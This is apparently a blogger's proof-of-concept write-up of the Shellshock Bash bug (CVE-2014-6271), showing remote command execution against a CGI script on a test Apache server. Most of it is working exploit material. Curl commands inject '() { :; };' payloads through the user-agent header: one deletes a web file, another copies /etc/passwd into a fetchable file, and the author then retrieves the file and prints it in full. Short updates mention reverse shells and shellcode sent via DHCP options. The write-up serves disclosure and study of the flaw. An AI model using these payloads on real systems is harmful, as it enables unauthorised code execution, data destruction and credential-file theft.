CVE-2014-6271

A fun Bash bug: it doesn’t stop interpreting a variable at the end of a functions, and is, therefore, susceptible to arbitrary command execution. If you’re using CGIs, this becomes RCE.
For this example, I’ve chosen to abuse the user-agent setting:
1
2
3
$ curl http://192.168.0.1/target
 
PoC||GTFO
Great, we get a page. Now lets go looking for a CGI script… and as it happens, we’ve found one, poc.cgi:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/bash
 
echo “Content-type: text/html”
echo “”
 
echo ‘<html>’
echo ‘<head>’
echo ‘<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″>’
echo ‘<title>PoC</title>’
echo ‘</head>’
echo ‘<body>’
echo ‘<pre>’
/usr/bin/env
echo ‘</pre>’
echo ‘</body>’
echo ‘</html>’
 
exit 0
Requesting this CGI gives a nice picture of the environment:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ curl http://192.168.0.1/poc.cgi
 
<html>
<head>
<meta httpequiv=“Content-Type” content=“text/html; charset=UTF-8”>
<title>PoC</title>
</head>
<body>
<pre>
SERVER_SIGNATURE=<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
 
HTTP_USER_AGENT=curl/7.26.0
SERVER_PORT=80
HTTP_HOST=192.168.0.1
DOCUMENT_ROOT=/var/www
SCRIPT_FILENAME=/var/www/poc.cgi
REQUEST_URI=/poc.cgi
SCRIPT_NAME=/poc.cgi
REMOTE_PORT=40974
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
SERVER_ADMIN=webmaster@localhost
HTTP_ACCEPT=*/*
REMOTE_ADDR=192.168.0.1
SHLVL=1
SERVER_NAME=192.168.0.1
SERVER_SOFTWARE=Apache/2.2.22 (Debian)
QUERY_STRING=
SERVER_ADDR=192.168.0.1
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
_=/usr/bin/env
</pre>
</body>
</html>
Now, using the Bash bug, and the handy flag for setting the user-agent with curl, we do the following evil thing:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ curl A “() { :; }; /bin/rm /var/www/target” http://192.168.0.1/poc.cgi
 
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
Notice that I’ve used a path that is owned by the webserver to avoid permission issues. Also, in quick testing, anything that wrote to STDOUT caused header errors. I even tried sending the content type in the user-agent definition. Back to checking on the damage that we have done:
1
2
3
4
5
6
7
8
9
10
11
$ curl http://192.168.0.1/target
 
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /target was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
So there it is, RCE for a Bash CGI script.

Update 1:

Getting around the STDOUT issue wrecking headers is easier than I thought; cat the file and redirect the output, then fetch the file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ curl A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi
 
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
</body></html>
and the fetch:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ curl http://192.168.0.1/dumped_file
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
wwwdata:x:33:33:wwwdata:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats BugReporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debianexim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

 Update 2:

Seeing some slick reverse shells now on pastebin. This is going to be nasty, especially on embedded systems that aren’t using busybox.

Update 3:

Talked with @loganattwood OOB about timing attacks against DHCP lease expiry & passing shellcode via DHCP options. Nice privilege escalation scenario.